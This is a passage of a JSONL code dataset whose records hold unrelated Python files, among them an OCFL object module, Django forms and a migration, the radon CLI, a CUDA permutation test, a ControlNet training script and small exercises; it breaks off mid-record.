Returns the version block from the inventory.\n \"\"\"\n inv = self.parse_inventory(objdir)\n if version == 'head':\n version = inv['head']\n logging.info('Object at %s has head %s' % (objdir, version))\n else:\n if version not in inv['versions']:\n raise ObjectException(\"Object at %s does not include a version '%s'\" % (objdir, version))\n if os.path.isdir(dstdir):\n raise ObjectException('Target directory %s already exists, aborting!' % dstdir)\n parentdir, dir = os.path.split(os.path.normpath(dstdir))\n if parentdir != '':\n if not os.path.exists(parentdir):\n raise ObjectException('Destination parent %s does not exist or is not directory' % parentdir)\n os.mkdir(dstdir)\n manifest = inv['manifest']\n state = inv['versions'][version]['state']\n for digest, logical_files in state.items():\n existing_file = manifest[digest][0]\n for logical_file in logical_files:\n logging.debug('Copying %s -> %s' % (digest, logical_file))\n dstfile = os.path.join(dstdir, logical_file)\n dstpath = os.path.dirname(dstfile)\n try:\n os.makedirs(dstpath)\n except OSError as e:\n if not os.path.isdir(dstpath):\n raise\n\n copyfile(os.path.join(objdir, existing_file), dstfile)\n\n logging.info('Extracted %s into %s' % (version, dstdir))\n return VersionMetadata(inventory=inv, vdir=version)\n\n def parse_inventory(self, path):\n \"\"\"Read JSON root inventory file for object at path.\n\n Will validate the inventory and normalize the digests so that the rest\n of the Object methods can assume correctness and matching string digests\n between state and manifest blocks.\n \"\"\"\n inv_file = os.path.join(path, 'inventory.json')\n with open(inv_file) as (fh):\n inventory = json.load(fh)\n iv = InventoryValidator()\n iv.validate(inventory)\n if iv.log.num_errors > 0:\n raise ObjectException('Root inventory is not valid (%d errors)' % iv.log.num_errors)\n digest_algorithm = iv.digest_algorithm\n manifest = inventory['manifest']\n for digest in manifest:\n norm_digest = normalized_digest(digest, digest_algorithm)\n if digest != norm_digest:\n manifest[norm_digest] = manifest[digest]\n manifest.remove(digest)\n\n for v in inventory['versions']:\n state = inventory['versions'][v]['state']\n for digest in state:\n norm_digest = normalized_digest(digest, digest_algorithm)\n if digest != norm_digest:\n state[norm_digest] = state[digest]\n state.remove(digest)\n\n return inventory\n\n def prnt(self, *objects):\n \"\"\"Print method that uses object fhout property.\n\n Avoid using Python 3 print function so we can run on 2.7 still.\n\n Can't call this 'print' in 2.7, hence 'prnt'.\n \"\"\"\n s = ' '.join(str(o) for o in objects) + '\\n'\n if sys.version_info > (3, 0):\n self.fhout.write(s)\n else:\n self.fhout.write(s.decode('utf-8'))","sub_path":"pycfiles/ocfl_py-0.0.3-py3.6/object.cpython-36.py","file_name":"object.cpython-36.py","file_ext":"py","file_size_in_byte":24953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"391185310","text":"# -*- coding: utf-8 -*-\nfrom bugurtach.models import Bugurt\nfrom django import forms\n\nclass AddBugurt(forms.ModelForm):\n class Meta:\n model = Bugurt\n fields = ('name', 'text', 'author')\n widgets = {\n 'name': forms.TextInput({'required': True}),\n 'text': forms.Textarea({'required': True}),\n 'author': forms.HiddenInput()\n }\n\nclass EditBugurt(forms.ModelForm):\n class Meta:\n model = Bugurt\n fields = ('name', 'text')\n widgets = {\n 'name': forms.TextInput(),\n 'text': forms.Textarea(),\n }\n\nclass AddTag(forms.Form):\n title = forms.CharField(label=\"\", widget=forms.TextInput(attrs={'title': 'enter one name for tag'}))\n\nclass AddProof(forms.Form):\n link = forms.CharField(label=\"\", widget=forms.TextInput(attrs={'title': 'enter one link for proof'}))","sub_path":"bugurtach/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"279990843","text":"'''In this module the CLI interface is created.'''\n\nimport sys\nfrom mando import Program\ntry:\n import colorama\n colorama.init(strip=(not sys.stdout.isatty()))\n GREEN, YELLOW, RED = (colorama.Fore.GREEN, colorama.Fore.YELLOW,\n colorama.Fore.RED)\n MAGENTA, CYAN, WHITE = (colorama.Fore.MAGENTA, colorama.Fore.CYAN,\n colorama.Fore.WHITE)\n BRIGHT, RESET = colorama.Style.BRIGHT, colorama.Style.RESET_ALL\nexcept ImportError:\n # No colorama, so let's fallback to no-color mode\n GREEN = YELLOW = RED = MAGENTA = CYAN = WHITE = BRIGHT = RESET = ''\n\nimport json as json_mod\nimport collections\nfrom contextlib import contextmanager\nimport radon.complexity as cc_mod\nfrom radon.tools import iter_filenames, cc_to_dict, raw_to_dict\nfrom radon.complexity import cc_visit, cc_rank, sorted_results\nfrom radon.raw import analyze\nfrom radon.metrics import mi_visit, mi_rank\n\n__version__ = '0.5.2'\n\n\nRANKS_COLORS = {'A': GREEN, 'B': GREEN,\n 'C': YELLOW, 'D': YELLOW,\n 'E': RED, 'F': RED}\n\nLETTERS_COLORS = {'F': MAGENTA,\n 'C': CYAN,\n 'M': WHITE}\n\nMI_RANKS = {'A': GREEN, 'B': YELLOW, 'C': RED}\nTEMPLATE = '{0}{1} {reset}{2}:{3} {4} - {5}{6}{reset}'\nprogram = Program(version=__version__)\n\n\ndef log(msg, *args, **kwargs):\n '''Log a message, passing `*args` to `.format()`.\n\n `indent`, if present as a keyword argument, specifies the indent level, so\n that `indent=0` will log normally, `indent=1` will indent the message by 4\n spaces, &c..\n `noformat`, if present and True, will cause the message not to be formatted\n in any way.'''\n indent = 4 * kwargs.get('indent', 0)\n m = msg if kwargs.get('noformat', False) else msg.format(*args)\n sys.stdout.write(' ' * indent + m + '\\n')\n\n\ndef log_list(lst, **kwargs):\n '''Log an entire list, line by line.'''\n for line in lst:\n log(line, **kwargs)\n\n\ndef log_error(msg, *args, **kwargs):\n '''Log an error message. Arguments are the same as log().'''\n log('{0}{1}ERROR{2}: {3}'.format(BRIGHT, RED, RESET, msg), *args, **kwargs)\n\n\ndef _format_line(line, ranked, show_complexity=False):\n '''Format a single line. *ranked* is the rank given by the\n `~radon.complexity.rank` function. If *show_complexity* is True, then\n the complexity score is added.\n '''\n letter_colored = LETTERS_COLORS[line.letter] + line.letter\n rank_colored = RANKS_COLORS[ranked] + ranked\n compl = '' if not show_complexity else ' ({0}) '.format(line.complexity)\n return TEMPLATE.format(BRIGHT, letter_colored, line.lineno,\n line.col_offset, line.fullname, rank_colored,\n compl, reset=RESET)\n\n\ndef _print_cc_results(path, results, show_complexity, min, max, total_average):\n '''Print Cyclomatic Complexity results.\n\n :param path: the path of the module that has been analyzed\n :param show_complexity: if True, show the complexity score in addition to\n the complexity rank\n '''\n res = []\n counted = 0\n average_cc = .0\n for line in results:\n ranked = cc_rank(line.complexity)\n if min <= ranked <= max:\n average_cc += line.complexity\n counted += 1\n res.append(_format_line(line, ranked, show_complexity))\n elif total_average:\n average_cc += line.complexity\n counted += 1\n if res:\n log(path)\n log_list(res, indent=1)\n return average_cc, counted\n\n\ndef analyze_cc(paths, exclude, ignore, order_function, no_assert):\n '''Analyze the files located under `paths`.\n\n :param paths: A list of paths to analyze.\n :param exclude: A comma-separated string of fnmatch patterns.\n :param ignore: A comma-separated string of patterns to ignore.\n :param min: The minimum rank to output.\n :param max: The maximum rank to output.\n :param order_function: Can be `SCORE`, `LINES` or `ALPHA`, to sort the\n results respectively by CC score, line number or name.\n :param no_assert: If `True` assert statements will not be counted.'''\n for name in iter_filenames(paths, exclude, ignore):\n with _open(name) as fobj:\n try:\n results = sorted_results(cc_visit(fobj.read(),\n no_assert=no_assert),\n order_function)\n yield name, results\n except Exception as e:\n log(name)\n log_error(e, indent=1)\n continue\n\n\ndef analyze_raw(paths, exclude, ignore):\n '''Analyze the files located under `paths`.\n\n :param paths: A list of paths to analyze.\n :param exclude: A comma-separated string of fnmatch patterns.\n :param ignore: A comma-separated string of patterns to ignore.'''\n for name in iter_filenames(paths, exclude, ignore):\n with _open(name) as fobj:\n try:\n yield name, analyze(fobj.read())\n except Exception as e:\n log(name)\n log_error(e, indent=1)\n continue\n\n\n@program.command\ndef mi(multi=True, exclude=None, ignore=None, show=False, *paths):\n '''Analyze the given Python modules and compute the Maintainability Index.\n\n The maintainability index (MI) is a compound metric, with the primary aim\n being to determine how easy it will be to maintain a particular body of\n code.\n\n :param -e, --exclude : Comma separated list of patterns to exclude.\n :param -i, --ignore : Comma separated list of patterns to ignore.\n Radon won't even descend into those directories.\n :param -m, --multi: If given, multiline strings are counted as comments.\n :param -s, --show: If given, the actual MI value is shown in results.\n :param paths: The modules or packages to analyze.\n '''\n for name in iter_filenames(paths, exclude, ignore):\n with _open(name) as fobj:\n try:\n result = mi_visit(fobj.read(), multi)\n except Exception as e:\n log(name, indent=1)\n log_error(e, indent=1)\n continue\n except KeyboardInterrupt:\n log(name)\n return\n rank = mi_rank(result)\n color = MI_RANKS[rank]\n to_show = '' if not show else ' ({0:.2f})'.format(result)\n log('{0} - {1}{2}{3}{4}', name, color, rank, to_show, RESET)\n\n\n@program.command\ndef cc(path, min='A', max='F', show_complexity=False, average=False,\n exclude=None, ignore=None, order='SCORE', json=False, no_assert=False,\n total_average=False, *more_paths):\n '''Analyze the given Python modules and compute Cyclomatic\n Complexity (CC).\n\n The output can be filtered using the *min* and *max* flags. In addition\n to that, by default complexity score is not displayed.\n\n :param path: The path where to find modules or packages to analyze.\n :param -n, --min : The minimum complexity to display (default to A).\n :param -x, --max : The maximum complexity to display (default to F).\n :param -e, --exclude : Comma separated list of patterns to exclude.\n By default hidden directories (those starting with '.') are excluded.\n :param -i, --ignore : Comma separated list of patterns to ignore.\n If they are directory names, radon won't even descend into them.\n :param -s, --show-complexity: Whether or not to show the actual complexity\n score together with the A-F rank. Default to False.\n :param -a, --average: If True, at the end of the analysis display the\n average complexity. Default to False.\n :param --total-average: Like `-a, --average`, but it is not influenced by\n `min` and `max`. Every analyzed block is counted, no matter whether it\n is displayed or not.\n :param -o, --order : The ordering function. Can be SCORE, LINES or\n ALPHA.\n :param -j, --json: Format results in JSON.\n :param --no-assert: Do not count `assert` statements when computing\n complexity.\n :param more_paths: Additional paths to analyze.\n '''\n paths = [path] + list(more_paths)\n min = min.upper()\n max = max.upper()\n average_cc = .0\n analyzed = 0\n order_function = getattr(cc_mod, order.upper(), getattr(cc_mod, 'SCORE'))\n cc_data = analyze_cc(paths, exclude, ignore, order_function,\n no_assert)\n if json:\n result = {}\n for key, data in cc_data:\n result[key] = list(map(cc_to_dict, data))\n log(json_mod.dumps(result), noformat=True)\n else:\n for name, results in cc_data:\n cc, blocks = _print_cc_results(name, results, show_complexity, min,\n max, total_average)\n average_cc += cc\n analyzed += blocks\n\n if (average or total_average) and analyzed:\n cc = average_cc / analyzed\n ranked_cc = cc_rank(cc)\n log('\\n{0} blocks (classes, functions, methods) analyzed.', analyzed)\n log('Average complexity: {0}{1} ({2}){3}', RANKS_COLORS[ranked_cc],\n ranked_cc, cc, RESET)\n\n\n@program.command\ndef raw(exclude=None, ignore=None, summary=False, json=False, *paths):\n '''Analyze the given Python modules and compute raw metrics.\n\n Raw metrics include:\n\n * LOC: The number of lines of code (total)\n * LLOC: The number of logical lines of code\n * SLOC: The number of source lines of code (not necessarily\n corresponding to the LLOC)\n * comments: The number of Python comment lines\n * multi: The number of lines which represent multi-line strings\n * blank: The number of blank lines (or whitespace-only ones)\n\n The equation:\n\n sloc + blanks = loc\n\n should always hold.\n\n :param -e, --exclude : Comma separated list of patterns to exclude.\n By default hidden directories (those starting with '.') are excluded.\n :param -i, --ignore : Comma separated list of patterns to ignore.\n Radon won't even descend into those directories.\n :param -s, --summary: If given, at the end of the analysis display the\n summary of the gathered metrics. Default to False.\n :param -j, --json: Format results in JSON.\n :param paths: The modules or packages to analyze.\n '''\n headers = ['LOC', 'LLOC', 'SLOC', 'Comments', 'Multi', 'Blank']\n sum_metrics = collections.defaultdict(int, zip(headers, [0] * 6))\n\n raw_data = analyze_raw(paths, exclude, ignore)\n\n if json:\n result = {}\n for key, data in raw_data:\n result[key] = raw_to_dict(data)\n log(json_mod.dumps(result), noformat=True)\n else:\n for path, mod in raw_data:\n log(path)\n for header, value in zip(headers, mod):\n log('{0}: {1}', header, value, indent=1)\n sum_metrics[header] = sum_metrics[header] + value\n if not mod.loc:\n continue\n log('- Comment Stats', indent=1)\n comments = mod.comments\n log('(C % L): {0:.0%}', comments / (float(mod.loc) or 1), indent=2)\n log('(C % S): {0:.0%}', comments / (float(mod.sloc) or 1),\n indent=2)\n log('(C + M % L): {0:.0%}', (comments + mod.multi) / float(mod.loc),\n indent=2)\n\n if summary:\n log('** Total **')\n for header in sum_metrics:\n log('{0}: {1}', header, sum_metrics[header], indent=1)\n\n\n@contextmanager\ndef _open(path):\n \"\"\"\n :param path : file path to open ('-' for stdin)\n :returns file: open file object\n \"\"\"\n if path == '-':\n yield sys.stdin\n else:\n with open(path) as f:\n yield f\n","sub_path":"radon/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":11819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"7643751","text":"#coding:utf-8\nimport pickle\ncache = {'id':123, 'name':'Alice', 'content':None}\nserialized = pickle.dumps(cache)\nprint(serialized)\nprint(serialized == cache)\ndeserialized = pickle.loads(serialized)\nprint(deserialized == cache)\nprint(deserialized is cache)\n\nprint('pickle.dump and pickle.load')\nimport os\ndir_path = os.path.abspath(os.path.dirname(__file__))\nf = open(dir_path + '/data.pk1', 'wb')\npickle.dump(cache,f)\nf.close()\nf = open(dir_path + '/data.pk1', 'rb')\ndeserialized = pickle.load(f)\nf.close()\nprint(\"deserialized == cache: %s\" % str(deserialized == cache))\n\nclass Node(object):\n def __init__(self, name):\n self.name = name\n self.edges = []\n def connect(self, node):\n self.edges.append(node)\n\na = Node('a')\nb = Node('b')\nc = Node('c')\na.connect(b)\nb.connect(c)\nc.connect(a)\nserialized = pickle.dumps(a)\ndeserialized = pickle.loads(serialized)\nprint(deserialized.edges[0].edges[0].edges[0].name)\n","sub_path":"s-cubism/18-1/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"459952241","text":"def print_rangoli(size):\n\n l = [chr(i+97) for i in xrange(size)]\n ll = []\n for i in range(size,0,-1):\n temp = l[i-1]\n for j in range(i,size):\n temp = l[j]+'-'+temp+'-'+l[j]\n ll.append(temp)\n\n for i in range(size,0,-1):\n print (i-1) * '--' + ll[size-i]+ (i-1)*'--'\n \n \n for i in range(size-1,0,-1): \n print (size-i) * '--' +ll[i-1]+(size-i) * '--'\nif __name__ == '__main__':\n n = int(raw_input())\n print_rangoli(n)","sub_path":"challenge23.py","file_name":"challenge23.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596078540","text":"from os import path\nfrom types import CodeType\n\nfrom RestrictedPython import compile_restricted as compile\nfrom RestrictedPython import safe_builtins\n\nfrom .consts import BUILD_FILE_NAME\n\n\ndef create_target_path(relpath: str) -> str:\n if relpath.startswith('./'):\n relpath = relpath[2:]\n\n return '//' + relpath\n\n\ndef compile_buildfile(filepath: str) -> CodeType:\n with open(filepath) as f:\n return compile(f.read(), filepath, 'exec')\n\n\nclass BuildFile:\n def __init__(self, filename: str, workspace: 'Workspace') -> None:\n self.workspace = workspace\n self.dir_path = path.dirname(filename)\n self.target = create_target_path(path.dirname(filename))\n self._compiled: CodeType = None\n\n @property\n def compiled(self):\n if self._compiled is None:\n self._compiled = compile_buildfile(path.join(\n self.dir_path,\n BUILD_FILE_NAME,\n ))\n\n return self._compiled\n\n def execute(self, build_locals: dict):\n exec(self.compiled, safe_builtins, build_locals)\n","sub_path":"forgebuild/buildfile.py","file_name":"buildfile.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"418260605","text":"try:\n #open the file correctly\n #all of the file get store in the variable\n file = open(\"order.txt\", \"r\")\n\n #Read line by line, store it in another variable (list_of_lines)\n list_of_lines = file.readlines()\n print(list_of_lines)\n\n #Iterate over the list_of_lines and print out each line :)\n for line in list_of_lines:\n print(line.rstrip('\\n'))\n\n #Clean up by closing the file\n file.close()\n\n #this is the section on error handling\nexcept FileNotFoundError as errmsg:\n print(\"don't panic, but file not found\")\n print(errmsg)\n raise\n# except:\n# print('There as been an error! Panic')\n","sub_path":"orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"608385237","text":"from share import *\n\nimport pytorch_lightning as pl\nfrom torch.utils.data import DataLoader\nfrom tutorial_dataset import MyDataset\nfrom cldm.logger import ImageLogger\nfrom cldm.model import create_model, load_state_dict\n\n\n# Configs\nresume_path = './models/control_sd21_ini.ckpt'\nbatch_size = 4\nlogger_freq = 300\nlearning_rate = 1e-5\nsd_locked = True\nonly_mid_control = False\n\n\n# First use cpu to load models. Pytorch Lightning will automatically move it to GPUs.\nmodel = create_model('./models/cldm_v21.yaml').cpu()\nmodel.load_state_dict(load_state_dict(resume_path, location='cpu'))\nmodel.learning_rate = learning_rate\nmodel.sd_locked = sd_locked\nmodel.only_mid_control = only_mid_control\n\n\n# Misc\ndataset = MyDataset()\ndataloader = DataLoader(dataset, num_workers=0, batch_size=batch_size, shuffle=True)\nlogger = ImageLogger(batch_frequency=logger_freq)\ntrainer = pl.Trainer(gpus=1, precision=32, callbacks=[logger])\n\n\n# Train!\ntrainer.fit(model, dataloader)\n","sub_path":"workers/ControlNet/tutorial_train_sd21.py","file_name":"tutorial_train_sd21.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"181551824","text":"import numpy as np\nfrom numba import cuda\nfrom cuda_fill_array import fill_array_u4_v_u2, fill_array_f8_v_u2, fill_array_f8_v_u4\nimport math\n\nclass significance_of_mean_cuda(object):\n \"\"\"Fast p-value calculation.\n Credit:\n Relevant githubs:\n Micheal H: https://github.com/hoehleatsu/permtest\n Lukas Käll: https://github.com/statisticalbiotechnology/exactpermutation\n Relevant articles:\n Bert Green: A Practical Interactive Program for Randomization Tests of Location\n Marcello Pagano & David Tritchler: On Obtaining Permutation Distributions in Polynomial Time\n Jens Gebhard and Norbert Schmitz: Permutation tests- a revival?! II. An efficient algorithm for computing the critical region \n \"\"\"\n def __init__(self,num_bin = None, dtype_v=np.uint64, dtype_A=np.float64, new_version=False):\n \"\"\"\n Args:\n num_bin (int): NThe number of bins to divide each sample-set.\n dtype_v (type): The datatype of small arrays and values.\n dtype_A (type): The datatype type of large arrays.\n \"\"\"\n self.num_bin = num_bin\n self.dtype_v = dtype_v\n self.dtype_A = dtype_A\n if self.dtype_v == np.uint16 and self.dtype_A == np.uint32:\n self._get_perm = fill_array_u4_v_u2\n\n elif self.dtype_v == np.uint16 and self.dtype_A == np.float64:\n self._get_perm = fill_array_f8_v_u2\n \n elif self.dtype_v == np.uint32 and self.dtype_A == np.float64:\n self._get_perm = fill_array_f8_v_u4\n else:\n raise ValueError(\"The selected value tkype combination is currently not available!\")\n \n def _get_digitized_score(self, X, bins):\n \"\"\"Digitize the values for each sample.\n\n Args:\n X (array): Concatenated sample from original samples A and B.\n bins(int): The number of bins to divide the sample values.\n\n Returns:\n digitized array\n \"\"\"\n digitized = np.zeros(X.shape,dtype=self.dtype_v)\n for i, (x,b) in enumerate(zip(X,bins)):\n digitized[i,:] = np.digitize(x, b).astype(self.dtype_v) - 1\n return digitized\n\n def _ensure_contiguous(self, z, S, A0, A1, init=None):\n \"\"\"Assert all arrays are contiguous.\n Args:\n A0 (array): Initialize A0 array.\n A1 (array): Second array to start fill.\n S(int): Sum up to :m.\n z(array): Digitized array.\n Returns:\n Contiguous arrays.\n \"\"\"\n return (np.ascontiguousarray(z, self.dtype_v), np.ascontiguousarray(S, self.dtype_v),\n np.ascontiguousarray(A0, self.dtype_A), np.ascontiguousarray(A1, self.dtype_A))\n\n def _load_gpu(self, z, S, A0, A1):\n \"\"\"Load arrays onto the GPU's.\n Args:\n z (array): Digitized array.\n A0 (array): Initialized A0 array.\n A1 (array): Second array to fill.\n S(int): Sum up to :m.\n Returns:\n GPU arrays.\n \"\"\"\n stream = cuda.stream()\n return (stream, cuda.to_device(z, stream), cuda.to_device(S, stream),\n cuda.to_device(A0, stream), cuda.to_device(A1, stream))\n \n \n\n def _run_calculations(self, dA0, dA1, dz, dS, length, threadsperblock, blockspergrid, stream, A0, A1):\n \"\"\"Start to fill the rest of working array.\n Args:\n dz (array): Digitized GPU-array.\n dA0 (array): Initialized A0 GPU-array.\n dA1 (array): A1 GPU-array.\n dS(int): Sum up to :m. GPU-array\n blockdim(tripple): Dimension of GPU-block\n griddim(tripple): Dimension of GPU-grid\n stream: GPU-stream\n Returns:\n The two last calculated sub-arrays (onto the GPU), dA0 and dA1.\n \"\"\"\n for i in range(1, length + 1):\n self._get_perm[blockspergrid, threadsperblock, stream](dA0, dA1, self.dtype_v(i), dz, dS)\n tmp = dA0\n dA0 = dA1\n dA1 = tmp \n return dA0, dA1\n \n def _get_calculated_array(self, dA0,dA1, A1,A0, stream, m):\n \"\"\"Retrieve the final subarray to host.\n Args:\n dA0 (array): Initialized A0 GPU-array.\n dA1 (array): A1 GPU-array.\n m (int): Length of sample A.\n stream: GPU-stream.\n Returns:\n Returns the necessary part for the p-value calculation from the final sub-array.\n \"\"\"\n dA0.to_host(stream)\n stream.synchronize()\n return A0[:, m - 1, :]\n\n def _calculate_p_values(self, Z, n_samples, S, A ,bins):\n \"\"\"Calculate p-value for each sub-array\n Args:\n Z (array): The necessary part of the array to calculate sample p-values.\n n_samples (int): The total number of samples.\n S(int): Sum up to :m.\n A(array): The Values from sample A.\n bins(array): Bins for digitization.\n Returns:\n p-values\n \"\"\"\n P = np.zeros(n_samples)\n for i, (a,b) in enumerate(zip(A,bins)):\n pmf = Z[:,i] / np.sum(Z[:,i])\n a_ = np.digitize(a, b).astype(self.dtype_v) - 1\n P[i] = np.sum(pmf[int(sum(a_)):(int(S[i])+1)])\n return P\n\n def _exact_perm_numba_shift(self, m, n, S, z):\n \"\"\"Run the shift-method on the GPU.\n Args:\n m (int): Sample size of sample A\n n (int): Sample size of sample B\n S(int): Sum up to :m.\n z (array): Digitized array.\n Returns:\n A necessary part of the calculated array to retrieve p-values.\n \"\"\"\n n_samples = z.shape[0]\n\n A0 = np.zeros([int(np.max(S)) + 1, m, n_samples], self.dtype_A)\n\n NN, NM, _ = A0[:, :, :].shape\n \n threadsperblock = (64, 3, 2)\n blockspergrid = (int(np.ceil((NN)/ threadsperblock[0])),\n int(np.ceil(NM/threadsperblock[1] + 1)),\n int(np.ceil(n_samples / threadsperblock[2] + 1)))\n \n A1 = np.zeros([int(np.max(S)) + 1, m, n_samples], self.dtype_A)\n\n z, S, A0, A1 = self._ensure_contiguous(z, S, A0, A1)\n \n stream, dz, dS, dA0, dA1 = self._load_gpu(z,S,A0,A1)\n \n dA0, dA1 = self._run_calculations(dA0, dA1, dz, dS, m + n, threadsperblock, blockspergrid, stream, A0, A1)\n return self._get_calculated_array(dA0,dA1, A1,A0, stream, m)\n \n\n def run(self, A, B):\n \"\"\"Run method on the GPU.\n Args:\n A (array): Samples A.\n B (array): Samples B.\n Returns:\n p-values\n \"\"\"\n m = A.shape[1]\n n = B.shape[1]\n\n n_samples = A.shape[0]\n\n X = np.concatenate([A,B],axis=1)\n X.sort()\n\n if not self.num_bin:\n self.num_bin = np.ceil(np.max(X)) - np.floor(np.min(X)) + 1\n\n bins = np.linspace(np.min(X, axis=1), np.max(X, axis=1), self.num_bin, axis=1)\n\n digitized = self._get_digitized_score(X, bins)\n\n S = np.sum(digitized[:, m:], axis=1)\n \n self.numerator = self._exact_perm_numba_shift(int(m), int(n), S, digitized)\n self.p_values = self._calculate_p_values(self.numerator, n_samples, S, A, bins)\n \n def get_numerator(self):\n \"\"\"Get numerator.\n Returns:\n numerator\n \"\"\"\n return self.numerator\n \n def get_p_values(self):\n \"\"\"Get p-values.\n Returns:\n Get p-values\n \"\"\"\n return self.p_values\n\n \n","sub_path":"significance_of_mean_cuda.py","file_name":"significance_of_mean_cuda.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"34081458","text":"#!/usr/bin/python3\nfrom sys import stdin\n\ndef main ():\n n = int (stdin.readline ())\n bc = stdin.read ().splitlines ()\n ans = 0\n for line in bc [::-1]:\n b, c = map (int, line.split ())\n b = (ans + b) % c\n if b: ans += c - b\n print (ans)\n\nif __name__ == \"__main__\": main ()","sub_path":"_equal_division.py","file_name":"_equal_division.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"207056871","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('nsa_rest', '0002_auto_20150304_2013'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='machine',\n name='loan_end_date',\n field=models.DateTimeField(null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='machine',\n name='owner',\n field=models.CharField(max_length=100, null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='machine',\n name='owner_email',\n field=models.EmailField(max_length=100, null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='machine',\n name='loan_start_date',\n field=models.DateTimeField(null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"nsa_rest/migrations/0003_auto_20150304_2018.py","file_name":"0003_auto_20150304_2018.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"332844912","text":"import requests\nimport json\nfrom datetime import datetime, timedelta\n\n\ndef get_trending_repositories(top_size, count_of_days):\n days_ago = (\n datetime.today() - timedelta(count_of_days)\n ).strftime('%Y-%m-%d')\n params = {\n 'q': 'created>{}'.format(days_ago),\n 'sort': 'stars',\n 'order': 'desc'\n }\n all_repos = requests.get(\n 'https://api.github.com/search/repositories',\n params=params\n ).json()\n trend_repo = all_repos['items'][:top_size]\n return trend_repo\n\n\ndef get_issues(owner, repo_name):\n data_issue = requests.get(\n 'https://api.github.com/repos/{}/{}/issues'.format(\n owner,\n repo_name\n )\n ).json()\n return data_issue\n\n\ndef print_repo_info(repo_name, html_url, count_of_issues):\n print('Repository: {}'.format(repo_name))\n print('URL: {}'.format(html_url))\n print('Count of issues: {}'.format(count_of_issues))\n\n\nif __name__ == '__main__':\n top_size = 20\n count_of_days = 7\n trending_repos = get_trending_repositories(top_size, count_of_days)\n for repo in trending_repos:\n issues = (get_issues(repo['owner']['login'], repo['name']))\n print_repo_info(repo['name'], repo['html_url'], len(issues))\n","sub_path":"github_trending.py","file_name":"github_trending.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"64600949","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport argparse\nimport os\nfrom datetime import datetime\nfrom utils.logger import setlogger\nimport logging\nfrom utils.train_utils_base import train_utils\nimport torch\nimport warnings\nprint(torch.__version__)\nwarnings.filterwarnings('ignore')\n\nargs = None\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train')\n\n # model and data parameters\n parser.add_argument('--model_name', type=str, default='CNN_1d', help='the name of the model')\n parser.add_argument('--data_name', type=str, default='JNU', help='the name of the data')\n parser.add_argument('--data_dir', type=str, default='D:/Data\\江南大学数据\\数据', help='the directory of the data')\n\n parser.add_argument('--transfer_task', type=list, default=[[0], [1]], help='transfer learning tasks')\n parser.add_argument('--normlizetype', type=str, default='mean-std', help='nomalization type')\n\n\n # adabn parameters\n parser.add_argument('--adabn', type=bool, default=True, help='whether using adabn')\n parser.add_argument('--eval_all', type=bool, default=False, help='whether using all samples to update the results')\n parser.add_argument('--adabn_epochs', type=int, default=3, help='the number of training process')\n\n\n # training parameters\n parser.add_argument('--cuda_device', type=str, default='0', help='assign device')\n parser.add_argument('--checkpoint_dir', type=str, default='./checkpoint_adabn', help='the directory to save the model')\n parser.add_argument(\"--pretrained\", type=bool, default=False, help='whether to load the pretrained model')\n parser.add_argument('--batch_size', type=int, default=64, help='batchsize of the training process')\n parser.add_argument('--num_workers', type=int, default=0, help='the number of training process')\n\n\n # optimization information\n parser.add_argument('--opt', type=str, choices=['sgd', 'adam'], default='adam', help='the optimizer')\n parser.add_argument('--lr', type=float, default=1e-3, help='the initial learning rate')\n parser.add_argument('--momentum', type=float, default=0.9, help='the momentum for sgd')\n parser.add_argument('--weight-decay', type=float, default=1e-5, help='the weight decay')\n parser.add_argument('--lr_scheduler', type=str, choices=['step', 'exp', 'stepLR', 'fix'], default='step', help='the learning rate schedule')\n parser.add_argument('--gamma', type=float, default=0.1, help='learning rate scheduler parameter for step and exp')\n parser.add_argument('--steps', type=str, default='150, 250', help='the learning rate decay for step and stepLR')\n\n\n # save, load and display information\n parser.add_argument('--max_epoch', type=int, default=300, help='max number of epoch')\n parser.add_argument('--print_step', type=int, default=600, help='the interval of log training information')\n\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n\n args = parse_args()\n os.environ['CUDA_VISIBLE_DEVICES'] = args.cuda_device.strip()\n # Prepare the saving path for the model\n sub_dir = args.model_name + '_' + datetime.strftime(datetime.now(), '%m%d-%H%M%S')\n save_dir = os.path.join(args.checkpoint_dir, sub_dir)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n # set the logger\n setlogger(os.path.join(save_dir, 